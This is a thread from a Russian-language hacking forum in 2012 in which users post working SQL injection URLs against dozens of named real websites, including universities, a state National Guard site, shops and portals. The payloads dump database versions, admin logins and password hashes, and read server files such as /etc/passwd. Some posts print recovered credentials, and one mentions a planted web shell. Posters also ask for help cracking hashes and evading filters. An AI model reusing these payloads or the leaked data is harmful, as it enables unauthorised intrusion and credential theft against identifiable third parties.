http://www.movie-phil.de/movie.php?id=-124+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22+--+
http://www.eventdirect.ca/game.php?ID=-62+union+select+1,2,3,4,concat_ws(0x3a,username,pa ssword),6,7,8,9,10+from+admin+--+
solgryn.org/product.php?id=-IWBTB'+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a ,version(),user(),database()),10,11+--+
Га-Ноцри
05.04.2012, 19:04
PHP:
http://www.cycletec.de/cms/index.php?page=-9+union+select+1,2,concat_ws(0x03a,id,user,passwor d),4,5,6,7,8,9+from+cycletec.admin_users--
http://tandem-plus.com.ua/index.php?news=25+and+1=2+union+select+1,login,3,p ass,5,6+from+users--
Га-Ноцри
06.04.2012, 01:55
Так и не побежденный мною сайт.
Как мы видим, File_Priv = Y, но магические кавычки = ON
PHP:
http://www.itradeindonesia.com/market_data.php?sub=-1+union+select+load_file(0x433a5c626f6f742e696e69)--
Благодаря специфичной реализации сайта, при которой скрипты, составляющие основу юзабилити сайта, как физически присутствуют на сервере в виде отдельных файлов, так и полностью записаны в базу данных, имеется возможность провести sql-инъекцию в сочетании с php-инклудом(я впервые встретил такой наглядный пример, ввиду своего небольшого опыта)
PHP:
http://www.itradeindonesia.com/market_data.php?sub=-1+union+select+0x2e2e2f2e2e2f696e646578--
Это именно то, о чем вы подумали, залитое через админку, и попавшее в БД. Проинклудить это мне не удалось.
PHP:
http://www.itradeindonesia.com/market_data.php?sub=-1+union+select+file_upload+from+ps_daily_stock+lim it+60,60--
Саму админку, вы без проблем найдете по адресу
PHP:
http://www.itradeindonesia.com/admin.php
P.S. Сайт является аналогом нашего ололо форекса(онлайн-трейдинг), правил раздела не нарушает, админ поставлен в известность, но пароли от админки как были прежними, так ими и остались, что символизирует. По традиции - если кто-то сможет получить доступ к серверу с помощью веб-шелла, дайте знать. Спасибо. (рад избавиться от этого сайта, стоящего мне бессоные сутки )
http://www.pereslavl.ru/images/logo_green.gif
http://www.pereslavl.ru/news/world_news.cgi?show_news=-290840%20and%201=2%20union%20select%201,2,concat_w s(char(58),version(),user(),database(),@@version_c ompile_os),4,5,6,7+--
5.0.22-Debian_2-log world_news@localhost world_news pc-linux-gnu
http://www.six-sigma.ru/index.php?id=140+and+1=2+union+select+1,+2,+3,+con cat(email,':',pass),+5,+6,+7,+8,+9+from+mail
Га-Ноцри
06.04.2012, 20:01
PHP:
http://www.telecomsolutions.asia/productdetails.php?pid=-2489+union+select+1,2,3,4,5,6,7,concat_ws(0x03a,Ad minId,Username,Password,Email,Status),9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 ,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,6 3,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79, 80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96 +from+admin_users--
Skofield
07.04.2012, 00:09
Code:
http://www.usu.edu/studemp/offcampus/showdetails.php?jobNum=-4326'+union+select+1,version(),3,4,5,6,7,8,9,0,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33--+
Database Version: 5.1.26-rc-community
Database name: employment
User name: studemp@web01.usu.edu
ozdorov.com
http://www.ozdorov.com/view_news.php?id=76'+or+1+group+by+concat((select+ substr(concat_ws(0x3a,email,password),1,99)+from+b c_forumnsp.phpbb_users+limit+0,1),0x00,floor(rand( 0)*2))having+min(0)+or+1--+
10k users
5.1.49-rel11.3-log
Яндекс тИЦ (CY) 10
Google PageRank (PR)
prestig-tur.com.ua
http://prestig-tur.com.ua/28.html?id=930+limit+0,0+union+select+version%28%2 9,2--+
5.5.20
Яндекс тИЦ (CY) 10
Google PageRank (PR) 2
continenttour.ru
http://www.continenttour.ru/curort.php?id=52%27+or+1+group+by+concat%28%28sele ct+version%28%29%29,0x00,floor%28rand%280%29*2%29% 29having+min%280%29+or+1--+
5.0.26-log
Яндекс тИЦ (CY) 30
Google PageRank (PR) 3
greatsteppe.kz
http://www.greatsteppe.kz/view_post.php?id=21+or+1+group+by+concat%28%28sele ct+substr%28concat_ws%280x3a,user,pass%29,1,99%29+ from+userlist+limit+0,1%29,0x00,floor%28rand%280%2 9*2%29%29having+min%280%29+or+1--+
http://www.greatsteppe.kz/admin/
Яндекс тИЦ (CY) 0
Google PageRank (PR) 1
l-art.ru
http://www.l-art.ru/notes.php?ID=6%27+or+1+group+by+concat%28%28select +version%28%29%29,0x00,floor%28rand%280%29*2%29%29 having+min%280%29+or+1--+
5.0.90-log
Яндекс тИЦ (CY) 10
Google PageRank (PR) 2
Га-Ноцри
07.04.2012, 03:33
PHP:
http://www.space-travel.ru/resorts/14?res=-3+union+select+1,2,3,4,5,concat_ws(0x03a,id,login, password,salt,admin),7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23+from+ontravel_users+limit+0,1--
Админ уведомлен.
P.S. По причине того, что я не смог получить plain их "соленыx" хешей
nemaniak
09.04.2012, 15:30
delinform.ru ТИЦ-230 blind
Code:
delinform.ru/tofirmcard.php?num=1004+and+4=substring(version(), 1,1)/*
uaq.org.ua ТИЦ-140
Code:
www.uaq.org.ua/index.php?module=subjects&func=viewpage&pageid=-73+union+select+1,2,3,4,concat_ws(0x3a,version(),u ser(),database()),6,7,8,9,10,11,12,13,14,15,16,17--
Code:
4.0.25-standard-log:quality_uaq@hosting3.adamant.net:quality_uaq
farmfresh.org PR-5 Alexa-444k
Code:
http://www.farmfresh.org/about/news_details.php?news=-32+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5--
Code:
5.1.39-log:fresh5farm@comhotspot.com:lgfoods
kingbeef
09.04.2012, 15:37
Тиц 250
PR 2
_http://www.truck.ru/pages.php?page=-6+union+select+1,2,concat_ws(0x3a,version(),user() ,database())--+f
5.0.51b-community-nt-log:truck@localhost:truck
Га-Ноцри
09.04.2012, 18:29
PHP:
http://www.heatpipe.asia/news_content.php?id=-1708+union+select+1,2,0x48656c6c6f2c20776f726c6421 ,4,5,6,7--
kingbeef
09.04.2012, 18:46
Сайт турагенства
Тиц 60
пр 2
http://www.amstel.su/news_view.php?id=-1+union+select+concat_ws(0x3a,version(),user()%20, database()),2--+g
5.1.56:amstel_db1@localhost:amstel_db1
Га-Ноцри
09.04.2012, 22:37
PHP:
http://www.ju-jitsu-az.com/photos.php?cat=-3+union+select+1,2,concat_ws(0x03a,user(),database (),version()),4--
vlad-i-mir
10.04.2012, 19:44
Code:
http://cinv.tv/anons?id=-2%20union%20select%201,concat_ws(0x3a,username,pas sword),3,4,5,6,7,8,9%20from%20modx_manager_users%2 0limit%200,1%20--
Га-Ноцри
11.04.2012, 01:20
PHP:
http://orka-aero.com/index.php?str=4&ido=429&idp=-710+union+select+1,2,3,4,file_priv,6,7,8,9+from+my sql.user--
PHP:
http://www.peski.ru/index.php?action=news&id=3932)+and+1=2+union+select+1,user,3,password,5, 6+from+mysql.user/*
Га-Ноцри
11.04.2012, 20:18
PHP:
http://www.springspartner.com/springsvegetables.php?cat=2&fruit=-2+union+select+1,concat_ws(0x03a,user(),database() ,version()),3,4,5,6--
PHP:
http://www.helicobacter.ru/index.php?i=-8+union+select+1,2,3,4,5,6,7,8,9,username,11,user_ password,13+from+f_users+where+username='имя ользователя с форума'
nemaniak
12.04.2012, 18:52
dma.state.mn.us PR-6
Нац. Гвардия штата Миннесота
Code:
www.dma.state.mn.us/press_room/e-zine/articles/index.php?item=-280+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24--
Code:
5.0.95-log:ng_internet@localhost:ng_internet
abireg.ru ТИЦ-1300 4к траффа
Code:
www.abireg.ru/sb/print.php?news=475'+union+select+1,2,concat_ws(0x3 a,version(),user(),database()),4,5,6,7,8,9,0,11,12 ,13,14,15,16,17,18,19,20,21+--+
Code:
5.0.26-lk-log:abiregmsk_school@localhost:abiregmsk_school
banglabarta24.net Alexa-164k blind
Code:
http://www.banglabarta24.net/english/Tamplate/news.php?news=UvSLyGQdxeQ' and 5=substring(version(),1,1) and 'tGbv'='tGbv&&ac=international
------
http://www.artem-kashkanov.ru/result.php?id=-4+union+select+1,column_name+from+information_sche ma.columns+where+table_name=0x7573657273+--
Га-Ноцри
13.04.2012, 00:33
PHP:
http://www.aussiewolf.hu/index.php?id=40+union+select+concat_ws(database(), user(),version())--
PHP:
http://threadandco.com/shop.php?id=42+union+select+1,concat_ws(0x3,id,0x3 a,username,0x3a,password),3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17+from+admin--
----------------------------------------------up
PHP:
http://www.glenferrie.com.au/shop.php?id=42+union+select+1,group_concat(0x0b,id ,0x3a,user_name,0x3a,user_pass),3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17+from+login_admin+--
nemaniak
13.04.2012, 17:27
temi.provincia.milano.it PR-7
Code:
http://temi.provincia.milano.it/donne/news/newst.php?news=-12260+UnIon+selECt+1,2,3,4,5,6,7,8,9,concat_ws(0x3 a,version(),user(),database()),11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 ,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,6 7,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83, 84+--+
Code:
5.0.77-log:donne@10.120.192.16:d_portale
allotment.org.uk PR-5 Alexa-49k
Code:
http://www.allotment.org.uk/diary/diary_day_detail.php?item=(348)and(select+1+from(s elect+count(*),concat(select+concat_ws(0x3a,versio n(),user(),database()+limit+0,1),floor(rand(0)*2)x +from+information_schema.tables+group+by+x)a)--
Code:
5.0.95-community:lotty_1@localhost:lotty_11
gemseducation.com PR-5 Alexa-182k
Code:
www.gemseducation.com/MENASA/gwa0029/contents.php?pageid=-712+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35--
Code:
5.0.77:gemsDBusr@localhost:gemseducation1
cy 60, pr 4, dmoz
http://life-prog.ru/view_video.php?id=-21%27+union+select+1,2,3,version%28%29,5,6+--+f
http://www.cheatsahoy.com/cheatsheet.php?gid=79-9.999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17--
Injectable column: 2
Version: 5.0.91-log
Tables count: 1
TucR - 10:3
SELECT database(): cheatsah_games
________________________________________
Омский государственный театр драмы
http://www.omskdrama.ru/wwwroot/index.php?gid=59-9.999+union+select+1,2,3,4,5,6,7--
Injectable column: 3
Version: 5.1.61-0+squeeze1-log
Tables count: 33
adminlogin,adminpassword FROM admins - Admin211140:h18kUYP3
TucR - 300:3
SELECT database(): z106032_omskdram
kingbeef
14.04.2012, 19:50
Тиц 3600
PR 6
http://rusk.ru/viewmessage.php?id=-83619+union+select+1,2,3,4,5,6--+f
Дальше крутить совесть и религия не позволила
http://dnevkino.ru/articles/?id=26+order+by+7
Докрутить не смог, вроде фильтрация идёт на уровне хостинга, даёт 403 еррору если в адресе есть union и select. Если кто подопнёт с советом буду рад.
Га-Ноцри
15.04.2012, 02:42
Для любителей велосипедного спорта.
PHP:
http://www.ciclisme.cat/calendario_listado.php?modalidad=-1+union+select+1,table_name,3+from+information_sch ema.tables+where+table_schema=0x6369636C69736D655F 66656465636174--
http://www.invictory.com.ua/tips_issue.php?id=7-9.999+union+select+1,2,3,4,5,6--
Injectable column: 3
Version: 5.0.95-community:cR - 20:4
SELECT database(): ivcomua_db:cR - 20:2
================================================
Продажа телефонов -)
http://www.phoneline.com.ua/product.php?id=479-9.999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
Injectable column: 5
Version: 5.0.87.d10-ourdelta-log
Tables count: 12
TucR - 10:1
Admin directory may be here: /admin.php
SELECT database(): Andry_phoneline
Code:
http://www.statusx.ru/index.php?status=1+and+substring(@@version,1,1)=5
Code:
http://www.kmsmuseum.ru/news.php?status=1&id=28+and+substring(@@version,1,1)=5
Code:
http://www.lessons.jet-host.ru/product.php?status=1+and+1=0+union+Select+1,concat _ws(0x3a,version(),database(),user()),3,4,5,6--+
version: 5.5.16-55
database: jetru_6402670_product
user: jetru_6402670@192.168.0.78
nicetravel.com.ua
PHP:
http://www.nicetravel.com.ua/News/?ID=27'+limit+0,0+union+select+version(),2,3,4,5,6 ,7,8,9,10,11,12,13--+
5.0.77-log
Яндекс тИЦ (CY) 50 -10
Alexa Rank 8,595,606 +109,463
Google PageRank (PR) 2
------------------------------------------------------------------------------------
pfcom.dp.ua
PHP:
http://pfcom.dp.ua/index.php?r=art&id=516+limit+0,0+union+select+1,version%28%29,3,4, 5--+
5.1.61-log
Яндекс тИЦ (CY) 0
Alexa Rank 18,143,367 -5,481,603
Google PageRank (PR) 1
------------------------------------------------------------------------------------
2mus.ru
PHP:
http://2mus.ru/read.php?id=2347+limit+0,0+union+select+version%28 %29,2,3,4,5,6,7,8--+
5.1.54-log
Яндекс тИЦ (CY) 20
Alexa Rank 0
Google PageRank (PR) 3
-----------------------------------------------------------------------------------
shax-dag.ru
PHP:
http://www.shax-dag.ru/groups.php?id=573&page=topics&topic_id=2214%27+or+1+group+by+concat%28%28select+ version%28%29%29,0x00,floor%28rand%280%29*2%29%29h aving+min%280%29+or+1--+
5.1.50
Яндекс тИЦ (CY) 80 +10
Alexa Rank 122,653 +37,930
Google PageRank (PR) 3
-----------------------------------------------------------------------------------
ufa-nnpcto.ru
PHP:
http://ufa-nnpcto.ru/index.php?id=5&id2=12+or+1+group+by+concat%28%28select+version%28 %29%29,0x00,floor%28rand%280%29*2%29%29having+min% 280%29+or+1--+
4.1.22-standard-log
Яндекс тИЦ (CY) 0
Alexa Rank 24,223,757 +19,278,573
Google PageRank (PR) 1
----------------------------------------------------------------------------------
ka-professional.ru
PHP:
http://www.ka-professional.ru/index.php?option=content&pcontent=1&task=view&id=914+or+1+group+by+concat%28%28select+version%28 %29%29,0x00,floor%28rand%280%29*2%29%29having+min% 280%29+or+1--+
5.2.10-MariaDB-log
Яндекс тИЦ (CY) 130 -10
Alexa Rank 1,091,829 -279,159
Google PageRank (PR) 3
-----------------------------------------------------------------------------------
invest-leasing.ru
PHP:
http://www.invest-leasing.ru/menu.php?id=2%27+limit+0,0+union+select+1,2,versio n%28%29,4,5--+
5.1.61-log
-----------------------------------------------------------------------------------
http://www.info.vn/
PR6
Code:
http://www.info.vn/phap-luat/hinh-su/169559-random-random-random-2-'or(select*from(select(name_const(version(),1)),na me_const(version(),1))a)and(1)='1
5.5.22-cll
random-random-random меняем любым текстом для уникальности
Га-Ноцри
18.04.2012, 00:57
PHP:
http://www.ramu.ru/news-details.php?id=-7215+union+select+1,2,concat_ws(0x03a,id,name,pass word,email),4+from+btl_users--
в опере работает
UPD
http://allinstyle.ru/?index.php'or(select*from(select(name_const(versio n(),1)),name_const(version(),1))a)and(1)='1
Га-Ноцри
19.04.2012, 01:14
PHP:
http://www.zupansport.com/index.php?&id=11&sid=-44+union+select+1,2,3,4,concat_ws(0x03a,u_id,u_use r,u_pass),6,7+from+userlist--
Вывод в сорс:
PHP:
http://spasti-nacaynika.ru/love/images/nacaynika_logo.jpg
http://spasti-nacaynika.ru/love/?intim-znakomstva=profile&id=-2750%20and%201=2%20union%20select%201,concat_ws(ch ar(58),@@version,user(),database(),@@version_compi le_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25+--
5.0.51a-24+lenny1-log c1432_warez@81.176.237.2 c1432_ta4ki debian-linux-gnu
Га-Ноцри
19.04.2012, 20:35
Историко-публицистический альманах.
PHP:
http://www.a-lubyanka.ru/index.php?id=-4+union+select+1,concat_ws(0x03a,name,pass),3,4,5, 6,7,8,9,10,11,12,13,14,15+from+al_auth+limit+1,1--
Code:
http://www.prepakproducts.com/category.php?cat=-44'+union+select+1,load_file(0x2f6574632f706173737 764),3,4/*
4.0.25
PR=3
kingbeef
20.04.2012, 02:16
Московский государственный университет
имени М.В.Ломоносова
Тиц 3000
PR 6
http://www.hist.msu.ru/Labs/CISCenter/conf.php?id=-5+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6--+f
5.1.61-LOG:NETSERVICE@93.180.11.3:SNG
Браузер опера
http://www.worlds.ru/?a=-1'or(select*from(select(name_const(version(),1)),n ame_const(version(),1))a)and(1)='1
'5.0.95-log'
Убрать пробелы
Га-Ноцри
20.04.2012, 22:25
PHP:
http://www.smesh.ru/news_company/index.php?id=-301+union+select+1,2,3,4,concat_ws(0x03a,id,login, passw)+from+client--
Женский магазин.
Тиц 375
PR 5
HTML:
http://www.elite-replica.ru/catalog.php?page=-1+union+select+1,2,group_concat(email,0x3a,passwor d,0x3a+separator+0x3C62723E),4,5,6,7,8,9+from+user s--
nemaniak
21.04.2012, 22:20
its.virginia.edu PR-7
Code:
http://its.virginia.edu/pubs/news/itemDisplay.php?itemID=2654'+AND+5=substring(versi on(),1,1)+AND+'UBeX'='UBeX
islandsphilippines.net PR-5
Code:
www.islandsphilippines.net/article_single.php?id=-126+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database())+--+
Code:
5.0.95-community:islandsp_technic@localhost:islandsp_isla nds
в тайтле картинки
masthead.ca PR-5
Code:
www.masthead.ca/includes/news_email.php?news=877-999.9+union+select+1,2,concat_ws(0x3a,version(),us er(),database()),4,5,6,7,8--
Code:
5.0.95-community:masthead_mh@localhost:masthead_mh
Сайт какой-то компании
http://www.mitsubishi.ru/rac.php?m=-1859+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,group_concat(schema_name+separat or+0x3C62723E),55+from+information_schema.schemata--
http://www.mitsubishi.ru/rac.php?m=-1859+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,group_concat(table_name+separato r+0x3C62723E),55+from+information_schema.tables+wh ere+table_schema=0x777777--
http://www.mitsubishi.ru/rac.php?m=-1859+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,group_concat(table_name+separato r+0x3C62723E),55+from+information_schema.tables+wh ere+table_schema=0x6D7973716C--
Вот еще магазин
http://www.ordvor.com/goods/index.php?productID=-125885+union+select+group_concat(table_name+separa tor+0x3C62723E)+from+information_schema.tables+whe re+table_schema=0x73686F70736372697074--
winstrool
22.04.2012, 11:52
PR:6 ТИЦ:20 Alexa:279521
schoolnet@localhost:5.0.77-log:schoolne_schoolnet2008
http://www.school.net.th/schoolnet/article/read.php?article_id=-518+UnIon+selECt+1,2,3,concat_ws(0x3a,user(),versi on(),database()),5,6,7,8,9,10,1111,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,(select(@x) from(select(@x:=0x00),(select(0)from(information_s chema.columns)where(table_schema!=0x696e666f726d61 74696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0 x3c62723e,table_schema,0x2e,table_name,0x3a,column _name))))x),31,32,33,34,35,36,37,38,39,40,41,42,43 ,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6 0,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76, 77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93 ,94,95,96,97,98,99,100,101,102,103,104,105,106,107 ,108,109,110,111,112,113,114,115,116,117,118,119,1 20,121,122,123,124,125,126,127,128,129,130,131,132 ,133,134,135+--+
http://www.karkza.org/forum.php?showmsg=28711+or%201%20group%20by%20conc at%28user%28%29,floor%28rand%280%29*2%29%29%20havi ng%20min%280%29%20or%201
karkza@k51502@s195.loopia.se
http://kunpp.ru/news.php?op=1&ch=1&stat=07401-9999999.9+union+select+1,2,3,4,5,version(),7,8,9--+f
Version(): 4.1.14
Га-Ноцри
22.04.2012, 17:48
Адвокатская контора.
PHP:
http://www.a-lunev.ru/documentation.php?doc=-6+union+select+1,2,3,concat_ws%280x03a,login,passw ord%29,5,6+from+ad_users+limit+1,1--
Cennarios
22.04.2012, 20:11
Интернет без го*на:
http://www.wap-shop.ru/?secid=19&id=11938&s=-9272a19c%27+union+select+1,2,3,group_concat%28tabl e_name%29+from+information_schema.columns+where+co lumn_name+like+%27%pass%%27--+%27&pid=6270&mode=tr&vid=1028
shadowrun
22.04.2012, 22:48
Code:
http://www.bravosolutions.com/saint_petersburg_establishment.php?z=-12+union+select+1,2,group_concat%28table_name%29,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,5 6,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72, 73,74,75+from+information_schema.tables+where+tabl e_schema=database%28%29+--+
красавец
23.04.2012, 02:34
www.intel-foto.ru
тиц100
http://intel-foto.ru/?a=-1'or(select*from(select(name_const(version(),1)),n ame_const(version(),1))a)and(1)='1
Внизу страницы
'5.0.67-percona-highperf-b7-log'
www.solidwaste.ru
тиц230
http://www.solidwaste.ru/?a=-1'or(select*from(select(name_const(version(),1)),n ame_const(version(),1))a)and(1)='1
Duplicate column name '5.0.77'
www.goroddosug.ru
тиц40
http://www.goroddosug.ru/?a=-1'or(select*from(select(name_const(version(),1)),n ame_const(version(),1))a)and(1)='1
'5.0.51a-24+lenny2+spu1'
winstrool
23.04.2012, 13:26
kingkra_db@91.206.200.131:5.1.56-log:kingkra_db
http://www.king-kra.com/index.php?page=show_text&id=-13%27+union+select+1,concat_ws%280x3a,user%28%29,v ersion%28%29,database%28%29%29,3+--+
alviol_dbuser@localhost:5.1.61-cll:alviol_alviol
http://www.alviol.by/index.php?page=news&id=-21+union+select+1,2,concat_ws%280x3a,user%28%29,ve rsion%28%29,database%28%29%29,4,5,6+--+
http://www.sssdrive.com/news_eng.php?id=-946'+union+select+1,2,3,version(),5,6,7,8,9,10,11, 12,13,14,15+--+
PR2 5.1.51
Code:
http://www.canis.no/rugaas/oneqanda.php?id=-704+/*!union*/+/*!select*/+concat_ws%280x3a,user%28%29,version%28%29,databas e%28%29%29,2,3,4--
Username: canisweb@localhost
Version: 5.0.51a-community-log
Database: Canis
GooglePR: 4 Page: 1,960,000
Желаете поиграть в букмекерской конторе нахаляву для тренировки мозга ???
А запросто !!
Inject
Code:
_ttp://www.betgames.ru/strategy/page.php?id=99%27+union+select+1,2,3,version%28%29 ,5,6+and+%27a%27=%27a
PR = 3
Логинимся тут => _ttp://www.betgames.ru/virtual/login.php
Ах да, это симулятор а не реальная контора, тока для тренировки навыков, так что тут всё чисто )
Га-Ноцри
25.04.2012, 23:00
PR=5
PHP:
http://www.sunyorange.edu/ce/announcement.php?announce_id=-422'+union+select+1,concat_ws(0x03a,username,pass) ,3,4,5,6,7+from+users--+
Не забываем смотреть robots.txt Там много интересностей.
красавец
25.04.2012, 23:27
http://www.bigtool.ru шоп
тиц 40
http://www.bigtool.ru/?a=-1'or(select*from(select(name_const(version(),1)),n ame_const(version(),1))a)and(1)='1
'5.0.92'
админа предупредил неделю назад, но ему видимо всё равно.
Га-Ноцри
26.04.2012, 01:28
Турецкий шоп. Админка находится по стандартному пути, но очень смущает вид и формат хеша В разделе криптографии не помогли - дерзай, юный кулхацкер, может у тебя получится.
PHP:
http://www.gurmebebek.com/index.php?id=-1+union+select+1,2,3,4,concat_ws(0x03a,user_id,use r_name,user_pass),6,7,8,9,10,11,12+from+gb_users--
Админа уведомить не удалось, ввиду сильного языкового барьера
http://speech-soft.ru/index.php?a=inf&inf=view&id_razdel=1181017375&id_prazdel=-1181017906+union+select+version%28%29,2,3,version% 28%29,5
ТИЦ - 60
ПР - 4
Всё о синтезе звука и речи (http://pr-cy.ru/analysis/speech-soft.ru)
Админ уведомлён =)
Так как спустя полгода мой шелл снесли, выкладываю в паблик
Крупный музыкальный портал (типа zay[antigoogle]cev.net)
www.bia2.com
PR = 5
Inject
PHP:
_ttp://www.bia2.com/horoscopes/horoscopes_today.php?id=99+and+1=2+union+select+nu ll,null,null,null,null,@@version,null,null,null,nu ll,null,null,null,null
Current User: root@50.97.140.227
Sql Version: 5.0.77
Current DB: soltan_horoscope
Data Bases:
Code:
information_schema
mysql
nyre
r1soft_saved_database_XzZYj0
r1soft_saved_database_aGNipq
soltan_bia2
soltan_horoscope
soltan_ivbd1
soltan_jokes
soltan_mp3
soltan_music
soltan_pourya
soltan_prankcalls
soltan_review
soltan_users
soltan_video
Немного о вкусняшках;
1) БД юзверей - около 35к
PHP:
_ttp://www.bia2.com/horoscopes/horoscopes_today.php?id=99+and+1=2+union+select+nu ll,null,null,null,null,%28SELECT+count%28*%29+FROM +%60soltan_ivbd1%60.ibf_members%29,null,null,null, null,null,null,null,null
2) БД юзверей - около 72к
PHP:
_ttp://www.bia2.com/horoscopes/horoscopes_today.php?id=99+and+1=2+union+select+nu ll,null,null,null,null,%28SELECT+count%28*%29+FROM +%60soltan_users%60.users%29,null,null,null,null,n ull,null,null,null
Так и не смог прочитать данные с таблицы gulfcoas_s9y кто розобрался стучите 477080587 буду рад поучится.
http://www.gulfcoastmag.org/index.php?n=3&si=-46+union+select+1,2,3,group_concat(schema_name+sep arator+0x3C62723E),5,6,7,8,9+from+information_sche ma.schemata--
http://www.gulfcoastmag.org/index.php?n=3&si=-46+union+select+1,2,3,group_concat(table_name+sepa rator+0x3C62723E),5,6,7,8,9+from+information_schem a.tables+where+table_schema=0x67756C66636F61735F67 756C66636F6173--
http://www.gulfcoastmag.org/index.php?n=3&si=-46+union+select+1,2,3,group_concat(column_name+sep arator+0x3C62723E),5,6,7,8,9+from+information_sche ma.columns+where+table_name=0x617574686F7273--
http://www.gulfcoastmag.org/index.php?n=3&si=-46+union+select+1,2,3,group_concat(author_first+se parator+0x3C62723E),5,6,7,8,9+from+authors--
Ну а вот сюда не пускает жду пояснений))
http://www.gulfcoastmag.org/index.php?n=3&si=-46+union+select+1,2,3,group_concat(password+separa tor+0x3C62723E),5,6,7,8,9+from+serendipity_authors--
http://all-abc.ru/
тиц 30
трафа 2К
http://all-abc.ru/?a=-1%27/**/or/**/%28select/**/count%28*%29from%28select/**/1/**/union/**/select/**/2/**/union/**/select/**/3%29x/**/group/**/by/**/concat%28mid%28%28select/**/table_name/**/from/**/information_schema.tables/**/limit/**/81,1%29,1,64%29,floor%28rand%280%29*2%29%29%29/**/and/**/%271%27=%271
Га-Ноцри
28.04.2012, 17:30
Любителям коллекционировать юзверей.
PHP:
http://www.oesworld.com/EbosRegister_cand.php?JID=-1+union+select+1,2,count(*)4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26+from+users--
PHP:
http://www.club-beat.com/print.php?what=article&id=-564+union+select+1,2,group_concat(nick,0x3a,pass), 4,5,6,7,8,9+from+admins+--+
PR=3
PHP:
http://www.academia.pan.pl/dokonania.php?id=-564+union+select+1,2,3,4,group_concat(r_id,0x3a,r_ nick,0x3a,r_email,0x3a,r_pass),6,7,8,9,10,11,12,13 ,14,15,16,17+from+admin_redaktorzy+--+
PR=4
одминка http://www.academia.pan.pl/cms/
DataBases
information_schema
generator
hofmann
hofmann_20110327
hofmann_latin1
hofmann_supermailer
hofmanntest2
hofmannumfrage
myadmin
mysql
test
twig
Inject
http://www.hofmannmarking.de/ru/tmpl_produkt.php?prodnr=-15+union+select+group_concat(schema_name+separator +0x3C62723E)+from+information_schema.schemata
http://www.hofmannmarking.de/ru/tmpl_produkt.php?prodnr=-15+union+select+group_concat(User,0x3a,Password+se parator+0x3C62723E)+from+mysql.user--
Bases
u72568
u72568_2
u72568_3
u72568_4
u72568_blog
u72568_interview
u72568_press
u72568_proiz
u72568_testdrive
http://www.pushcar.ru/news/auto/news.php?id=-1366+union+select+1,2,3,4,5,6,7,group_concat(schem a_name+separator+0x3C62723E),9,10,11,12+from+infor mation_schema.schemata--
боянчик)
http://drive-penza.ru/index.php?get=13&model=-71+union+select+1,2,3,4,5,6,group_concat(schema_na me+separator+0x3C62723E),8,9,10,11,12+from+informa tion_schema.schemata--
Га-Ноцри
29.04.2012, 00:19
Пафосный пользователь сайта на бесплатном хостинге. Улыбнул.
PHP:
http://www.appnaeducation.com/edu/?loc=view&act=app&jid=-53+union+select+1,2,3,4,5,concat_ws(0x03a,USERNAME ,PASSWORD),7,8,9,10,11,12,13,14,15,16,17+from+user s+where+UID=13--
нашел
http://www.jetskiworld.gr/touring_eng.php
?id=1031 union select 1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,1,2,3 ,4,5,6,7,8,9,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,1,2,3,4,5,6,7,8,9 from 331329_jetskiworld.ecsusers --
http://www.isopipe.gr/new.php?id=-11 union select news_id,news_title,news_lang ,news_intro,news_text,news_img_sm,news_img,news_or der from news --
увы нет таблиц пользовтаелей.
Га-Ноцри
29.04.2012, 20:24
Очередной образец неудачного сайтостроительства.
PHP:
